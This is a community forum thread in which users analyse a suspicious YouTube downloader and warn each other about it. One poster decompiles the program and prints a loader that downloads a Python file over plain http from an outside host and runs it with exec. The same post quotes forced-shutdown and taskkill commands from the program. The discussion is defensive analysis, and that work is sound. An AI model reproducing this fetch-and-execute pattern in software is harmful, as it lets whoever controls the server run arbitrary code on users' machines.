Re: Best Recommendations for Downloading Youtube Videos
Krantikari, have you read any of this? This is from the topic that was made about this a long time ago.
Really look. You don't just fix, something like Posts start.
OK, OK. Everyone cool it. As we speak I am sandboxing the program and am going to post my findings once I have unpacked the setup files and can get access to the actual executable (the setup itself is not harmful, according to virus total). Analyzing the installed program in my sandbox, I notice many things off of the bat, one of which is notable -- this program is written in Python! Python 3.6, to be precise. Extracting the setup file ("installing" it in my sandbox) and extracting the .exe file, I see the pyinstaller archive files, and now I have the compiled python bytecode. At this stage decompilation is trivial: I see that the app has the standard python stdlib, chardot, and this file called... MEX.pyc. Mmm... and what could this be?
Oh dear! Some suspicious code! Looky, friends:
import glob, wx, urllib.request, re, sys, webbrowser, threading, subprocess, os, locale, win32clipboard, pyperclip, datetime, time, ctypes, gettext
from html2text import html2text
from playsound import playsound
import encodings.idna
get = os.environ['temp']
item = urllib.request.urlretrieve('http://softjewel.droppages.com/MultiExtra/Data/MAX.py', 'MAX.py')
exec(open('MAX.py').read())
Looking at this "max.py" file...
First, it imports its "needed" modules. Then... there's this exception handler that gets it to try to remove itself from the file system. Should that fail, it does nothing.
Next, it trys to change to c:\ProgramData\MultiExtra. Not sue how that'll work since the app doesn't create it (maybe the setup does?). It then creates an appdata folder and creates its multiextra.ini file.
The worying thing however is how many downloads this thing does. There's another download on line 92 (the rest of the above discussion is just it doing its normal configuration) that it reads from using the URL http://softjewel.droppages.com/MultiExtra/Data/MAX.txt. (Note the lack of 'https'.) This file... doesn't seem to contain anything, if I browse to it. It also links to NVDA as well. (Note that this is the "actual" NVDA file, and is not malicious -- just version 2018.1.1, but it replaces that with the latest version on softpedia for some reason.)
We're not done though! This program also seems to do some very disturbing subprocess calls. In particular:
Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info)
It also runs command prompt:
Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info)
And this...
Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info)
And, of course, the end of the application, when it try's to taskkill itself instead of exiting properly:
Line 2,195: subprocess.Popen("taskkill /f /im MultiExtra.exe", startupinfo=info, shell=True)
Some things to note with these subprocess calls:
* Line 474: subprocess.Popen("taskkill /f /pid {pid} /t".format(pid=self.process.pid), startupinfo=info): This one isn't harmful -- unless, of course, he sets it to something like csrss's PID or another critical system process if he's able to gain that level of privilege.
* Line 560: subprocess.Popen("cmd.exe /c pushd " + self.DPath + " & start MultiExtraDownloads\Apps", startupinfo=info): this one is... entirely unnecessary and pointless. I don't get it. I don't really get what its trying to do (I think "MultiExtraDownloads\Apps" is some kind of executable or batch script or something like that).
* Line 562: subprocess.Popen("shutdown.exe -s -t 0", startupinfo=info): -s shuts down the computer, only; -t (/t) ells it to do an immediate shutdown.
There are also some other os.remove calls that are in here. I'd be happy to fully decompile all the code and upload it somewhere for people like cartertemm to go over and review.
As for the "this program steels files" accusation, I'm checking on that.
OK, I can't confirm that either way. It doesn't use shutil or networking -- that I can see anyway, other than urllib. It doesn't use shutil so it can't do any bulk copys, and it doesn't use os.rename, os.renames, or os.link/os.unlink, nor does it contact any remote servers via obscure protocols. Not that I can find, at any rate. So I think that for now we can discard that accusation (though don't bank on that, I didn't decompile the entire program tree).
In sum: the program does some disturbing activity which I'd like others to take up (I'm not going to read the entire program). On the surface it is *not* harmful. I repeat: it is *not* harmful on the surface. However, I would hold off accusations and destructive comments until people like cartertemm (and even myself if I decide to dive into that mess of code) can fully analyze it. In the meantime, I would hold off on using it lest you get hit by something we have not found.
Lucas1853
2019-05-20 11:50 am
Altered being
Offline
The thing is, it doesn't matter if MAX.py is the most harmless program ever made right now. Fact is, it could become devistatingly harmful, because it's downloading from an external source, I presume every time you open the app. Do not trust this program.
2019-05-20 11:54 am
hero caller
Offline
Blind Extra did something similar I believe. It downloaded then executed some Python file that could do just about anything...
Ethin
2019-05-20 12:55 pm
Stellar beater
Offline
39-41, exactly why I recommended people don't use it until we can examine it further. The fact that it immediately downloads code when you run it is incredibly suspicious and brings into question what the developer is trying to do. All three of you are correct in saying that, since the code is hosted on a server it could be changed. The fact that it calls exec and not some kind of sanatized eval (I don't get why you'd use eval or exec, period; its dangerous) makes it a threat. The code can do literally anything it likes so long as its valid syntax.
jaybird
2019-05-21 3:36 pm
Swamp machine
Offline
Guys, it's the principle of the thing. If I understand post 36 correctly, pretty much the first thing this program does when you run it is to download another program. That's bad enough, but again if I understand correctly, it then does absolutely no checks of what it just downloaded. It doesn't do any digital signature or hashing checks, it doesn't look at the downloaded program in any way. In fact, it doesn't even do so much as to check that what it received is, in fact, a Python program and not, say, an error document or some unrelated file. It just blindly executes it anyway. This is bad on so many levels it's not even funny. Putting aside for the moment the obvious scenario where the developer has put out this really nice program, then later decides to modify the downloaded program file to do something nasty, let's look at something even worse. Suppose someone else knows how this program works, and wants to have a little fun at the developer's expense. So they hack into the developer's website and upload their own program in place of the correct one. So now, since the software does no integrity checks whatsoever, it downloads the new Python code uploaded by the hacker instead of the intended Python code, and this new code might do absolutely anything!
This is extremely dangerous! It might be just fine today, but then tomorrow, with absolutely no change to the program you run, it turns nasty. Nobody, and I mean absolutely nobody! can review this software anywhere at all, on Youtube, on a blog, etc. Since it downloads Python code at startup, nobody can know for certain what it will do. For this reason, nobody's review can be trusted.
-- Audiogames-reflector mailing list Audiogames-reflector@sabahattin-gucukoglu.com https://sabahattin-gucukoglu.com/cgi-bin/mailman/listinfo/audiogames-reflector
